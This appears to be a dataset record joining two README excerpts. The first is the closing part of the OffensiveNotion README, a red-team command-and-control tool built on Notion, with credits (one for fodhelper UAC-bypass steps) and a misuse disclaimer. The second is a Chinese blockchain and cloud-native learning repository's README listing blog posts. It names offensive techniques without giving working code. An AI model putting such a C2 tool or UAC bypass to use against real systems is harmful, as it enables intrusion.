get going right away! ## Documentation Please see the [Wiki][wiki] for setup, usage, commands, and more! ## Thanks & Acknowledgements > This project has been a blast for me! I learned a ton about Rust and how the mechanics of a C2 work. So thank you to my co-creator @mttaggart for helping me along the way. None of this would have been possible without your technical acumen and creativity. > >Thank you to Joe Helle (@joehelle) for the POC steps for the fodhelper UAC bypass. > >Thank you to all of the great red team devs who came before me, too numerous to list them all, who have created some of my favorite tools. Iโ€™m continually inspired by the red dev innovation in our field. > >-Husky > > As a fairly new security person, I had no idea I'd end up working with such a fantastically talented, kind, and reliable partner and hacker as @HuskyHacks. It's been a true privilege to build this alongside him. > > I want to thank the [Taggart Tech](https://twitch.tv/mttaggart) community for supporting us along the way and always offering helpful feedback. This would not be possible without you all. > >-Taggart ## Contributors The dev team would like to thank the following contributors for their work on OffensiveNotion: | Contributor | Contribution | | ----------- | ------------ | | [@MEhrn00](https://github.com/MEhrn00) | Execution guardrails for domain name/joined status ๐Ÿš€ | | [@hitcxy](https://github.com/hitcxy) | Improved shell encoding ๐Ÿš€ | --- | Legend | | ------ | | ๐Ÿš€ - Issue/PR submitted and code landed | |๐Ÿ’ก - Cool ideas | |๐Ÿค” - Consultation/Inspiration | | ๐Ÿ›- Bug submission/fix | ## Disclaimer There is no way to make an offensive security relevant research tool and release it open source without the possibility of it falling into the wrong hands. This tool is only to be used for legal, ethical purposes including, but not limited to, research, security assessment, education. The dev team is not responsible for the misuse of this tool by anyone if used for illegal/unethical purposes. No animals were harmed in the making of this code base (although Cosmo keeps climbing on my keyboard and I have to put him over on the couch, which I'm sure must feel like torture to him). See the LICENSE for more details. <!-- Links --> [issues]:https://github.com/mttaggart/OffensiveNotion/issues "OffensiveNotion Issues โžถ" [wiki]:https://github.com/mttaggart/OffensiveNotion/wiki "OffensiveNotion Documentation โžถ" [repo]:https://github.com/mttaggart/OffensiveNotion "OffensiveNotion Repository โžถ" [pr]:https://github.com/mttaggart/OffensiveNotion/pulls "OffensiveNotion Pull Requests โžถ" [license]:https://github.com/mttaggart/OffensiveNotion/blob/main/LICENSE "OffensiveNotion License File โžถ" [release]:https://img.shields.io/github/v/release/mttaggart/OffensiveNotion?label=RELEASE%3A%20Toledo&style=for-the-badge <!-- Badges --> [lastcommit]:https://img.shields.io/github/last-commit/mttaggart/OffensiveNotion?style=for-the-badge [img-pr-badge]:https://img.shields.io/badge/PRs-welcome-orange.svg?style=for-the-badge&logo=data%3Aimage%2Fsvg%2Bxml%3Bbase64%2CPD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48c3ZnIGlkPSJzdmcyIiB3aWR0aD0iNjQ1IiBoZWlnaHQ9IjU4NSIgdmVyc2lvbj0iMS4wIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciPiA8ZyBpZD0ibGF5ZXIxIj4gIDxwYXRoIGlkPSJwYXRoMjQxNyIgZD0ibTI5Ny4zIDU1MC44N2MtMTMuNzc1LTE1LjQzNi00OC4xNzEtNDUuNTMtNzYuNDM1LTY2Ljg3NC04My43NDQtNjMuMjQyLTk1LjE0Mi03Mi4zOTQtMTI5LjE0LTEwMy43LTYyLjY4NS01Ny43Mi04OS4zMDYtMTE1LjcxLTg5LjIxNC0xOTQuMzQgMC4wNDQ1MTItMzguMzg0IDIuNjYwOC01My4xNzIgMTMuNDEtNzUuNzk3IDE4LjIzNy0zOC4zODYgNDUuMS02Ni45MDkgNzkuNDQ1LTg0LjM1NSAyNC4zMjUtMTIuMzU2IDM2LjMyMy0xNy44NDUgNzYuOTQ0LTE4LjA3IDQyLjQ5My0wLjIzNDgzIDUxLjQzOSA0LjcxOTcgNzYuNDM1IDE4LjQ1MiAzMC40MjUgMTYuNzE0IDYxLjc0IDUyLjQzNiA2OC4yMTMgNzcuODExbDMuOTk4MSAxNS42NzIgOS44NTk2LTIxLjU4NWM1NS43MTYtMTIxLjk3IDIzMy42LTEyMC4xNSAyOTUuNSAzLjAzMTYgMTkuNjM4IDM5LjA3NiAyMS43OTQgMTIyLjUxIDQuMzgwMSAxNjkuNTEtMjIuNzE1IDYxLjMwOS02NS4zOCAxMDguMDUtMTY0LjAxIDE3OS42OC02NC42ODEgNDYuOTc0LTEzNy44OCAxMTguMDUtMTQyLjk4IDEyOC4wMy01LjkxNTUgMTEuNTg4LTAuMjgyMTYgMS44MTU5LTI2LjQwOC0yNy40NjF6IiBmaWxsPSIjZGQ1MDRmIi8%2BIDwvZz48L3N2Zz4%3D [img-license-badge]:https://img.shields.io/badge/license-mit-367588.svg?style=for-the-badge
Notion as a platform for offensive operations
null
7
6
83
548
13
7
1
cubxxw/awesome-cs-cloudnative-blockchain
# ่œ้ธŸ็š„ๆˆ้•ฟๆ‰‹ๅ†Œ[![Awesome](https://cdn.rawgit.com/sindresorhus/awesome/d7305f38d29fed78fa85652e3a63e154dd8e8829/media/badge.svg)](https://github.com/cubxxw/cs-awesome-Block_Chain) ## ๐Ÿงญ ๅฏผ่ˆช + ๐Ÿ”[**ๅฟซ้€ŸๆŒ‡ๅ—(wike) โ€” ไป“ๅบ“ๆ€ป็ป“**](https://github.com/cubxxw/Block_Chain/wiki) + ๐Ÿ”—[**ไธญๅ›ฝๅคง้™†ๅŠ ้€Ÿๅœฐๅ€๏ผˆGiteeๅนณๅฐ๏ผ‰**](https://gitee.com/xxw3293172751/Block_Chain) + ๐Ÿ“ต[**ไธ้™้€Ÿๅœจ็บฟไธชไบบไบ‘็›˜**](https://xxw.nsddd.top/s/wRSz) <p align='center'> <a href="https://gitee.com/xxw3293172751/Block_Chain"><img src="https://img.shields.io/badge/gitee-%40xxw3293172751-green?logo=gitee" title="ๅ›ฝๅ†…gitee้•œๅƒๅŠ ้€Ÿ"></a> <a href="https://wakatime.com/@c445b3c6-a2bc-43a2-a24a-0828a17244b4" title="้กน็›ฎ็š„่ฟ›ๅฑ•ๆ—ถ้•ฟ" > <img src="https://wakatime.com/badge/user/c445b3c6-a2bc-43a2-a24a-0828a17244b4.svg"></a> <a href="https://github.com/cubxxw/cs-awesome-Block_Chain/stargazers"><img alt="GitHub stars" src="https://img.shields.io/github/stars/3293172751/cs-awesome-Block_Chain?style=plastic"></a> <a href="https://xxw.nsddd.top/s/wRSz"><img alt="ไธชไบบ็ฝ‘็›˜ไธ้™้€Ÿ" src="https://img.shields.io/badge/cloud-xiongxinwei-red?logo=iCloud" title="ไธชไบบ็ฝ‘็›˜ไธ้™้€Ÿไธ‹่ฝฝๆต่งˆ"></a> <a href="https://trackgit.com"><img src="https://us-central1-trackgit-analytics.cloudfunctions.net/token/ping/la3dpo1i7zzecvro53al" alt="trackgit-views" /> </a> </p> <div align="center"> <a href = "https://github.com/cubxxw/cs-awesome-Block_Chain">๐Ÿ…ฑ๏ธGitHub</a> &emsp;&emsp; | &emsp;&emsp; <a href="https://interview.huihut.com">๐Ÿ“šDocCub</a> </div> <div align="center"> <a href = "readme_english.md">๐Ÿ”คEnglish</a> &emsp;&emsp; | &emsp;&emsp; <a href = "README.md">๐Ÿ†‘ไธญๆ–‡CN</a> </div> <br> <details><summary><b>๐Ÿ’ก ๅ…ณไบŽ</b></summary> <p><a href='https://www.facebook.com/profile.php?id=100034435372354'>Facebook</a> | <a href='https://telsacoin.io/'>Website</a> | <a href='http://nsddd.top'>Blog</a> | <a href='https://t.me/smile3293172751'>Telegram</a> | <a href='https://twitter.com/xxw3293172751'>Twitter</a> | <a href='https://www.linkedin.cn/injobs/in/xiongxinwei-xiong-7606a0227'>Linkedin</a> | <a href='https://liberapay.com/xiongxinwei/donate'>Donate</a></p> <p align='center'> <a href="https://www.linkedin.cn/injobs/in/xiongxinwei-xiong-7606a0227" target="_blank"><img src="https://img.shields.io/badge/linkedin-xiongxinwei-yellowgreen?logo=linkedin&style=flat-square"></a> <a href="https://twitter.com/xxw3293172751" target="_blank"><img src="https://img.shields.io/badge/twitter-%40xxw3293172751-informational?logo=twitter&style=flat-square"></a> <a href="https://www.zhihu.com/people/3293172751" target="_blank"><img src="https://img.shields.io/badge/%E7%9F%A5%E4%B9%8E-%E9%93%BE%E5%AD%A6%E8%80%85%E7%A4%BE%E5%8C%BA-blue?logo=zhihu&style=flat-square"></a> <a href="http://sm.nsddd.top/sm0d220ad72063197b9875379403f6c88.jpg" target="_blank"><img src="https://img.shields.io/badge/%E5%BE%AE%E4%BF%A1-smile-brightgreen?logo=wechat&style=flat-square"></a> <a href="https://space.bilibili.com/1233089591" target="_blank"><img src="https://img.shields.io/badge/b%E7%AB%99-%E6%97%A0%E4%B8%8E%E4%BC%A6%E6%AF%94%E7%9A%84%E5%BE%97%E5%BE%97-red?logo=bilibili&style=flat-square"></a> </p> <p align='center'> <a href="https://weibo.com/u/6248930985" target="_blank"><img src="https://img.shields.io/badge/%E5%BE%AE%E5%8D%9A-%E6%97%A0%E4%B8%8E%E4%BC%A6%E6%AF%94%E7%9A%84%E5%BE%97%E5%BE%97-critical?style=social&logo=Sina%20Weibo"></a> <a href="https://github.com/cubxxw" target="_blank"><img src="https://img.shields.io/badge/Github-xiongxinwei-inactive?style=social&logo=github"></a> <a href="http://nsddd.top" target="_blank"><img src="https://img.shields.io/badge/%E5%8D%9A%E5%AE%A2-%40xiongxinwei-blue?style=social&logo=Octopus%20Deploy"></a> </p> </hr> โš ๏ธ ่ฟ™ๆ˜ฏไธ€ไธช่œ้ธŸ็š„ๆˆ้•ฟ่ฎฐๅฝ•๏ผŒๅฆ‚ๆžœไฝ ไนŸๆƒณๆˆไธบๅทฅ็จ‹ๅธˆ๏ผŒๆƒณไปŽไบ‹ๅŽ็ซฏ็š„็›ธๅ…ณๅทฅไฝœ๏ผŒๆˆ–่€…ๆƒณไบ†่งฃๅŒบๅ—้“พ็š„็›ธๅ…ณ็Ÿฅ่ฏ†๏ผŒ้‚ฃไนˆๅฎƒๅฏไปฅๅธฎๅŠฉๅˆฐไฝ ๐Ÿ˜Ž โ€”> <b>ๅ–œๆฌข่ฏท็ป™ไธชโญๆ”ถ่—~</b> ๐Ÿง ๅ–œๆฌข*Go*่ฏญ่จ€็š„ๆœ‹ๅ‹ๆฌข่ฟŽๅŠ ๅ…ฅ*Go*่ฏญ่จ€่‡ชๅญฆ็พค๏ผˆ<a target="_blank" href="https://qm.qq.com/cgi-bin/qm/qr?k=ZZnzhuU8uGmIKT5btI9uiCRpasUeD8e2&jump_from=webapi&authKey=x1/NMrS1KpK7N8Rvj4IfLcKYSWnjtElgU6a3ubin1JmtReyuoIlyE/ZJ0VRlK25n"><img border="0" src="./images/group.png" alt="GoLang/Go่ฏญ่จ€/่‡ชๅญฆไบคๆต" title="GoLang/Go่ฏญ่จ€/่‡ชๅญฆไบคๆต"></a>*QQ*็พคๅท๏ผš[141984758](https://qm.qq.com/cgi-bin/qm/qr?k=ZZnzhuU8uGmIKT5btI9uiCRpasUeD8e2&jump_from=webapi&authKey=x1/NMrS1KpK7N8Rvj4IfLcKYSWnjtElgU6a3ubin1JmtReyuoIlyE/ZJ0VRlK25n)๏ผ‰ โ›“๏ธ <b>ๅŒบๅ—้“พๆŠ€ๆœฏ๏ผˆไนŸ็งฐไน‹ไธบๅˆ†ๅธƒๅผ่ดฆๆœฌๆŠ€ๆœฏ๏ผ‰</b>๏ผŒๆ˜ฏไธ€็งไบ’่”็ฝ‘ๆ•ฐๆฎๅบ“ๆŠ€ๆœฏ๏ผŒๅ…ถ็‰น็‚นๆ˜ฏ<font color ="gree">ๅŽปไธญๅฟƒๅŒ–๏ผŒๅ…ฌๅผ€้€ๆ˜Ž๏ผŒไฟกๆฏไธๅฏ็ฏกๆ”นๆ€ง๏ผŒ้š็งๅŒฟๅๆ€ง๐Ÿค‘</font><a href="https://github.com/C-UB">CUB้“พๅญฆ็คพ</a>่‡ดๅŠ›ๆ‰“้€ <b>ๅŒบๅ—้“พ่‡ชๅญฆๆ•™่‚ฒๅนณๅฐใ€‚</b> ๐Ÿ’ก ไพง่พน็›ฎๅฝ•ๆ”ฏๆŒๆ–นๅผ๏ผš[๐Ÿ“š DocCub ๆ–‡ๆกฃ](https://go.nsddd.top)ใ€๐Ÿ—ƒ๏ธ[Github + TOC ๅฏผ่ˆช](http://sm.nsddd.top/sm20221004130721.png?xxw@nsddd.top)๏ผŒ ๐Ÿ˜ ็”š่‡ณไฝ ๅฏไปฅๅœจ่ฟ™ไธช็•Œ้ขๆŒ‰ไธ‹`.` โžก๏ธ [่ฟ›ๅ…ฅvscode็ผ–่ฏ‘็Žฏๅขƒ](https://nsddd.top/archives/githubdev) ๐Ÿ‘ฃ ๅญ˜ๅœจๆ•ฐๅญฆๅ…ฌๅผๆ— ๆณ•ๆญฃๅธธๆ˜พ็คบ้—ฎ้ข˜๏ผŒๅผบ็ƒˆๆŽจ่[:triangular_ruler: MathJax Plugin for Github](https://chrome.google.com/webstore/detail/mathjax-plugin-for-github/ioemnmodlmafdkllaclgeombjnmnbima) ๆ’ไปถไฝฟ็”จใ€‚ ๐Ÿ“„ ไฟๅญ˜ไธบ PDF ๆ–นๅผ๏ผšไฝฟ็”จ Chrome ๆต่งˆๅ™จๆ‰“ๅผ€ <a href="https://go.nsddd.top">๐Ÿ“š DocCub ๆ–‡ๆกฃ</a> ้กต้ข๏ผŒ็ผฉ่ตทๅทฆไพง็›ฎๅฝ•-ๅณ้”ฎ - ๆ‰“ๅฐ - ้€‰ๆ‹ฉ็›ฎๆ ‡ๆ‰“ๅฐๆœบๆ˜ฏๅฆๅญ˜ไธบPDF - ไฟๅญ˜ โ€”โ€” [๐Ÿ–จ๏ธไปฅGo่ฏญ่จ€็ฌฌไธ€่Š‚ๆ‰“ๅฐๆ•ˆๆžœ้ข„่งˆ.pdf](./images/copy.pdf)๏ผ‰ ๐Ÿ™ ไป“ๅบ“ๅ†…ๅฎนๅฆ‚ๆœ‰้”™่ฏฏๆˆ–ๆ”น่ฟ›ๆฌข่ฟŽ [issue](https://github.com/cubxxw/cs-awesome-Block_Chain/issues) ๆˆ– pr๏ผŒ[๐Ÿงทๅ‚ไธŽ่ดก็Œฎ](https://nsddd.top/archives/contributors)๏ผŒๅปบ่ฎฎๆˆ–่ฎจ่ฎบๅฏๅœจ [#10](https://github.com/cubxxw/cs-awesome-Block_Chain/issues/10) ๆๅ‡บใ€‚็”ฑไบŽๆœฌไบบๆฐดๅนณๆœ‰้™๏ผŒไป“ๅบ“ไธญ็š„็Ÿฅ่ฏ†็‚นๆœ‰ๆฅ่‡ชๆœฌไบบๅŽŸๅˆ›ใ€่ฏปไนฆ็ฌ”่ฎฐใ€ไนฆ็ฑใ€ๅšๆ–‡็ญ‰๏ผŒ้žๅŽŸๅˆ›ๅ‡ๅทฒๆ ‡ๆ˜Žๅ‡บๅค„๏ผŒๅฆ‚ๆœ‰้—ๆผ๏ผŒ่ฏท [issue](https://github.com/cubxxw/cs-awesome-Block_Chain/issues/new/choose) ๆๅ‡บใ€‚ๆœฌไป“ๅบ“้ตๅพช [CC BY-NC-SA 4.0๏ผˆ็ฝฒๅ - ้žๅ•†ไธšๆ€งไฝฟ็”จ - ็›ธๅŒๆ–นๅผๅ…ฑไบซ๏ผ‰](https://github.com/huihut/interview/blob/master/LICENSE) ๅ่ฎฎ๏ผŒ่ฝฌ่ฝฝ่ฏทๆณจๆ˜Žๅ‡บๅค„๏ผŒไธๅพ—็”จไบŽๅ•†ไธš็›ฎ็š„ใ€‚ </details> </hr> <br> ## ๐Ÿ”ฅ CubDocๆŽจๅ‡บ ๐Ÿˆบ ๅญ˜ๅœจ`GitHub`ไธŠๆต่งˆๆ•ˆๆžœไธไฝณ๏ผŒ[Cub้“พๅญฆ็คพ](https://github.com/C-UB)ๆŽจๅ‡บ`CubDoc`ๆ–‡ๆกฃๅฝขๅผ๏ผŒไฝฟ็”จ`vuejs`ๆธฒๆŸ“ ใ€‚ไฝฟ็”จๅ›ฝๅ†…็š„ๆœๅŠกๅ™จๆญๅปบ๏ผˆ้€Ÿๅบฆๅ˜Žๅฟซ:bullettrain_front:) ใ€‚็›ฎๅ‰ๆ”ฏๆŒไปฅไธ‹็š„้กน็›ฎ๐Ÿ—ƒ๏ธ๏ผš + [x] [:speedboat: Go่ฏญ่จ€ๅŸบ็ก€-่ฟ›้˜ถ](https://go.nsddd.top) + [x] [:speedboat: docker & k8s & ไบ‘ๅŽŸ็”Ÿ](https://docker.nsddd.top) <br> ## ๐Ÿ—“๏ธ My ่ฎข้˜…็ฒพ้€‰ #### ๅšๅฎขไธ“ๆ  ๅšๅฎขไธŠ้ขๅ‘่กจ็š„ๆ–‡็ซ ๅ…ทๆœ‰็‹ฌ็ซ‹ๆ€ง๏ผŒๆ˜ฏๆˆ‘ๅ‚ไธŽๅผ€ๆบ้กน็›ฎไปฅๆฅ๏ผŒๆ‰€่งๆ‰€ๅพ—ๆ‰€ๅญฆ๏ผŒๅธŒๆœ›่ฟ™็งๆจกๅผๅฏไปฅๆˆๅŠŸๅนถไธ”ๅพ—ไปฅๆจกไปฟใ€‚[๐Ÿ‘€ ๆˆ‘็š„ๅšๅฎข](https://nsddd.top/) ่ฎฐๅฝ•็€ๅพˆๅคšไผ˜่ดจ็š„ๅ†…ๅฎนๅ€ผๅพ—ไธ€็œ‹๏ผŒๅฆ‚ๆžœๅธŒๆœ›่ฎข้˜… SSR โžก๏ธ[็‚น่ฟ™้‡Œ]([https://nsddd.top/rss.xml](https://nsddd.top/posts/index.xml)) [<img align="left" alt="shenxianpeng | ZhiHu" width="22px" src="https://www.svgrepo.com/show/305628/zhihu.svg" />][zhihu] [zhihu]: https://www.zhihu.com/people/3293172751 <a href="https://www.zhihu.com/people/3293172751" target="_blank"><img src="https://img.shields.io/badge/%E7%9F%A5%E4%B9%8E-%E9%93%BE%E5%AD%A6%E8%80%85%E7%A4%BE%E5%8C%BA-blue?logo=zhihu&style=flat-square"></a> <a href="http://sm.nsddd.top/sm0d220ad72063197b9875379403f6c88.jpg" target="_blank"><img src="https://img.shields.io/badge/%E5%BE%AE%E4%BF%A1-smile-brightgreen?logo=wechat&style=flat-square"></a> <details><summary><b>๐Ÿ“š ๆˆ‘็š„ๅšๅฎข่ฎข้˜…๏ผˆๆฏๅ‘จๆ›ดๆ–ฐโ—๏ผ‰</b></summary> </br> ๐Ÿ”ฅ ๅšๅฎขไธ“ๆ <b>ๆฏไธชๅทฅไฝœๆ—ฅ11๏ผš59่‡ชๅŠจๆ›ดๆ–ฐไธ€ๆฌก๏ผˆactions้ƒจ็ฝฒ๏ผ‰</b> ๏ผŒๅ–œๆฌขๆ–‡็ซ ๅ…ณๆณจ็‚น่ตž๐Ÿ‘ๅ™ข~ <!-- My-Blog:START --> - [ๅˆฉ็”จ LangChain ๆก†ๆžถ็š„่ฏญ่จ€ๆจกๅž‹ๅบ”็”จ๏ผšๅผ€ๅ‘่€…ๆŒ‡ๅ—](https://nsddd.top/zh/posts/harnessing-language-model-applications-with-langchain-a-developer-is-guide/) - [ๆŽข็ดขๅคงๅž‹่ฏญ่จ€ๆจกๅž‹๏ผˆllm๏ผ‰๏ผšไบบๅทฅๆ™บ่ƒฝๅœจ็†่งฃไธŽ็”Ÿๆˆไบบ็ฑป่ฏญ่จ€ๆ–น้ข็š„ๅ…ˆ้”‹](https://nsddd.top/zh/posts/exploring-large-language-models-llms-pioneering-ai-understanding-generation-human-language/) - [ๅก‘้€ ่Œไธš้“่ทฏ๏ผšๅผ€ๆบ็ฎ€ๅŽ†็”Ÿๆˆๅ™จไธŽไธ“ไธš็ฎ€ๅŽ†ๆŠ€ๅทงๆŒ‡ๅ—](https://nsddd.top/zh/posts/crafting-your-career-pathway-a-guide-to-open-source-resume-builders-and-expert-resume-tips/) - [่ฟ™ๆ˜ฏไธ€็ฏ‡ๆˆ‘่Œไธš็”Ÿๆถฏๆ€ป็ป“็š„ OpenIM ๆ•…้šœๆŽ’ๆŸฅๆŒ‡ๅ—](https://nsddd.top/zh/posts/troubleshooting-guide-for-openim/) - [ๆŽข็ดขๅผ€ๆบไปฅๅŠๅผ€ๆบๅ•†ไธšๆจกๅผ็ ”็ฉถ](https://nsddd.top/zh/posts/navigating-the-open-source-landscape/) - [Sora Ease ๆŒ‡ๅ—๏ผšๅผ€ๅ‘่€…ๆŽŒๆก Sora AI ็š„ๅ…จ้ขๆŒ‡ๅ—](https://nsddd.top/zh/posts/sora-ease-guide-mastering-sora-ai-for-developers/) - [2023ๅนด๏ผŒๆˆ‘็š„ๆ—…่กŒ่ตท็‚น - 2023ๅนด็š„ๆˆ‘ๆผซๆญฅๅœจไธ–็•Œ่พน็ผ˜](https://nsddd.top/zh/posts/in-2023-i-was-wandering-at-the-edge-of-the-world/) - [Sora ๆŠ€ๆœฏ่ฎจ่ฎบไปฅๅŠๆ™ฎ้€šไบบๅ’Œๅผ€ๅ‘่€…ๅฆ‚ไฝ•ๅˆฉ็”จ Sora ๆ”นๅ˜ไธ–็•Œ](https://nsddd.top/zh/posts/exploring-sora-technology-for-enthusiasts-and-developers/) - [ๅŒๅ‰‘ๅˆ็’ง๏ผš็ป“ๅˆGitHubไธŽGoogle Workspace็š„้กน็›ฎ็ฎก็†่‰บๆœฏ](https://nsddd.top/zh/posts/combining-github-and-google-workspace-for-project-management/) - [่„‘ๅ‹ๅฅฝๅž‹่‹ฑ่ฏญๅญฆไน ็ญ–็•ฅ๏ผšๅทฅๅ…ทไธŽๆŠ€ๅทง่งฃๆž](https://nsddd.top/zh/posts/brain-friendly-english-learning-strategies-tools-and-techniques-explained/) - [ๅฟƒๆต็Šถๆ€็š„้ญ”ๅŠ›๏ผšไธ“ๆณจไธŽๅนธ็ฆๆ„Ÿๆๅ‡ๆŒ‡ๅ—](https://nsddd.top/zh/posts/flow-state/) - [GTDไธŽๅ››่ฑก้™ๆณ•ๅˆ™ๅฎž่ทต](https://nsddd.top/zh/posts/gtd-and-the-four-quadrant-rule-practice/) - [Go ๆบ็ ้‡Œ็š„่ฟ™ไบ› go: ๆŒ‡ไปค && go ่‡ชๅŠจๅŒ–ๅทฅๅ…ท](https://nsddd.top/zh/posts/directives-and-the-use-of-automation-tools/) - [Go ่ฏญ่จ€ไธญ็š„ๅนถๅ‘็ฑปๅž‹ๆฃ€ๆŸฅไธŽ่ทจๅนณๅฐๅผ€ๅ‘](https://nsddd.top/zh/posts/concurrent-type-checking-and-cross-platform-development-in-go/) - [ๅ‘้‡ๆ•ฐๆฎๅบ“็š„ๅญฆไน ](https://nsddd.top/zh/posts/vector-database-learning/) - [OpenIM๏ผšๆž„ๅปบ้ซ˜ๆ•ˆ็š„็‰ˆๆœฌๆŽงๅˆถๅ’Œๆต‹่ฏ•ๅทฅไฝœๆต็จ‹](https://nsddd.top/zh/posts/openim-building-an-efficient-version-control-and-testing-workflow/) - [AIๅ…ƒๅนด: 2024ๅนด็š„ๆ–ฐๅ…ดๆŒ‘ๆˆ˜ไธŽ่ถ‹ๅŠฟ](https://nsddd.top/zh/posts/emerging-challenges-and-trends-in-2024/) - [ๅ›ž้กพไธŽๅ‰็žป๏ผšๆˆ‘็š„2023ๅนดๅบฆๆ€ป็ป“ๆŠฅๅ‘Š](https://nsddd.top/zh/posts/2023-annual-summary-reflections-and-aspirations/) - [ๅฏนๅผ€ๆบๅ•†ไธšๅŒ–็š„ๆ€่€ƒ & ๅ…จ็ƒๆต้‡ๅคงไผš๏ผˆGTC๏ผ‰ๅญฆไน ไปฅๅŠๆ€ป็ป“](https://nsddd.top/zh/posts/openim-open-source-business-journey/) - [GitOps ๅฎž่ทต็†่ฎบ๏ผšKubernetes ้ƒจ็ฝฒ็ญ–็•ฅๆทฑๅ…ฅ่งฃๆž](https://nsddd.top/zh/posts/gitops-practice-theory-part/) - [็ฎก็†ๅŽๅฐๅ’Œ็›‘ๆŽง็š„้ƒจ็ฝฒไธŽ่ฎพ่ฎก](https://nsddd.top/zh/posts/deployment-and-design-of-management-backend-and-monitoring/) - [Hugo ็š„้ซ˜็บงๆ•™็จ‹](https://nsddd.top/zh/posts/hugo-advanced-tutorial/) - [Kubernetes Kustomize ๅญฆไน ๆŒ‡ๅ—](https://nsddd.top/zh/posts/kubernetes-for-kustomize-learning/) - [่ฎพ่ฎก OpenIM ไฝฟ็”จ Harbor ๆž„ๅปบไผไธš้•œๅƒไป“ๅบ“](https://nsddd.top/zh/posts/openim-use-harbor-build-enterprise-mirror-repositories/) - [่‡ชๅŠจๅŒ–ๆต‹่ฏ•็š„ๅญฆไน (ไธ€)](https://nsddd.top/zh/posts/learn-about-automated-testing/) - [Kubernetes ๆŽงๅˆถๅนณ้ข - Kubectl ่ฏฆ็ป†่ฎฒ่งฃ](https://nsddd.top/zh/posts/deep-dive-into-the-components-of-kubernetes-kubectl/) - [Kubernetes ๆŽงๅˆถๅนณ้ข - ่ฐƒๅบฆๅ™จ](https://nsddd.top/zh/posts/deep-dive-into-the-components-of-kubernetes-scheduler/) - [Kubernetes ็š„ CNI๏ผŒCRI๏ผŒCSI ่ฏฆ่งฃ](https://nsddd.top/zh/posts/deep-dive-into-the-components-of-kubernetes-cni-csi-cri/) - [ๆทฑๅ…ฅไบ†่งฃKubernetes Kube apisserver็š„็ป„ไปถ](https://nsddd.top/zh/posts/deep-dive-into-the-components-of-kubernetes-kube-apiserver/) - [ๆทฑๅ…ฅไบ†่งฃKubernetes็ญ‰็ป„ไปถไน‹ETCD](https://nsddd.top/zh/posts/deep-dive-into-the-components-of-kubernetes-etcd/) - [้€š่ฟ‡้…็ฝฎๆ–‡ไปถ็ฎ€ๅŒ– Kubernetes ้ƒจ็ฝฒ็š„ๅ‚ๆ•ฐ็ซฏๅฃ้…็ฝฎ](https://nsddd.top/zh/posts/openim-cluster-deployment-parameter-passing-policy/) - [OpenIM ็š„้›†็พคๅŒ–่ฎพ่ฎก | Kubernetes ้ƒจ็ฝฒ | ๆ–นๆกˆ่ฎจ่ฎบ | ไผš่ฎฎๆ€ป็ป“](https://nsddd.top/zh/posts/openim-cluster-deployment-scheme-of/) - [ๅœจๅผ€ๆบ็คพๅŒบไธญๅญฆไผšๅฆ‚ไฝ•ๆ้—ฎ](https://nsddd.top/zh/posts/the-art-of-asking-questions-in-open-source-communities/) - [่‡ชๅŠจๅŒ–็š„้ซ˜็บง่ฟฝๆฑ‚๏ผš Prow ๆ˜ฏไป€ไนˆ๏ผŸKubernetes ไธบไป€ไนˆ้œ€่ฆๅฎƒ](https://nsddd.top/zh/posts/prow-ecological-learning/) - [ไธ€ไปฝๅฎŒๆ•ด็š„ๅผ€ๆบ่ดก็ŒฎๆŒ‡ๅ—๏ผˆๆไพ›็ป™็ฌฌไธ€ๆฌก่ธๅ…ฅๅผ€ๆบไผ™ไผด็ง˜็ฑ๏ผ‰](https://nsddd.top/zh/posts/open-source-contribution-guidelines/) - [ๆˆ‘็š„ๅฎž่ทตๆ€ป็ป“๏ผšๅผ€ๆบ็คพๅŒบ็š„่ง„่Œƒ่ฎพ่ฎกๆ€่ทฏ](https://nsddd.top/zh/posts/advanced-githook-design/) - [GoReleaser๏ผš่‡ชๅŠจๅŒ–ไฝ ็š„่ฝฏไปถๅ‘ๅธƒ](https://nsddd.top/zh/posts/go-release-tools/) - [ๆˆ‘็š„็ฌฌไธ€ไธชๅšๅฎข](https://nsddd.top/zh/posts/my-first-blog/) - [ๅ…ณไบŽๆˆ‘็š„ Hugo ๅšๅฎข (ๆ•™็จ‹)](https://nsddd.top/zh/posts/my-hugo/) - [้€Ÿ่ฏปๅผ€ๆบ้กน็›ฎ Sealos ็š„ๆบ็ ](https://nsddd.top/zh/posts/read-openim-project-sealos-openim-source-code/) - [ๆˆ‘ๅฆ‚ไฝ•่ฎพ่ฎก DevOps ไธ‹็š„ OpenIM ๆ ‡ๅ‡†ๅผ€ๅ‘ๆต & ๆ•ๆทไฝ“็ณป & ็ฒพ็›Šๆจกๅผ](https://nsddd.top/zh/posts/openim-devops-design/) - [ๆˆ‘ๆ˜ฏๅฆ‚ไฝ•ไผ˜้›…่ฎพ่ฎก OpenIM ๅคš่ฟ›็จ‹็ฎก็†็ญ–็•ฅ็š„](https://nsddd.top/zh/posts/openim-multi-process-management/) - [ๅฆ‚ไฝ•ๅฎ‰่ฃ…ๅ’Œไฝฟ็”จ่‡ชไธปไบบๅทฅๆ™บ่ƒฝๅทฅๅ…ทAuto-GPT](https://nsddd.top/zh/posts/use-auto-gpt/) - [Go ่ฐƒ่ฏ•ๆต‹่ฏ•ไปฅๅŠ่ฐƒ่ฏ•ๅทฅๅ…ท dlv ๅญฆไน ](https://nsddd.top/zh/posts/use-go-tools-dlv/) - [Github Actions ็š„้ซ˜็บงไฝฟ็”จๆŠ€ๅทง](https://nsddd.top/zh/posts/github-actions-advanced-techniques/) - [OpenIM็ฆป็บฟ้ƒจ็ฝฒ่ฎพ่ฎก](https://nsddd.top/zh/posts/openim-offline-deployment-design/) - [ๅผ€ๆบ็š„้˜ถๆฎตๆ€งๆˆ้•ฟๆŒ‡ๅ—](https://nsddd.top/zh/posts/stage-growth-of-open-source/) - [ไปŽ็†่ฎบๅˆฐๅฎž่ทต็š„้กน็›ฎ็ฎก็†ๆ‰“้€š](https://nsddd.top/zh/posts/project-management-from-theory-to-practice/) - [Openkf ๅคšๆžถๆž„้•œๅƒ็š„ๆž„ๅปบ็ญ–็•ฅ่ฎพ่ฎก](https://nsddd.top/zh/posts/openkf-multi-architecture-image/) - [ไธ€็ฏ‡้€‚็”จ่ฟœ็จ‹ๅทฅไฝœ็š„็บฆๅฎšๆŒ‡ๅ—๏ผš OpenIM ่ฟœ็จ‹ๅทฅไฝœๅ›ข้˜Ÿๅไฝœๅ่ฎฎ v1.3](https://nsddd.top/zh/posts/openim-remote-work-culture/) - 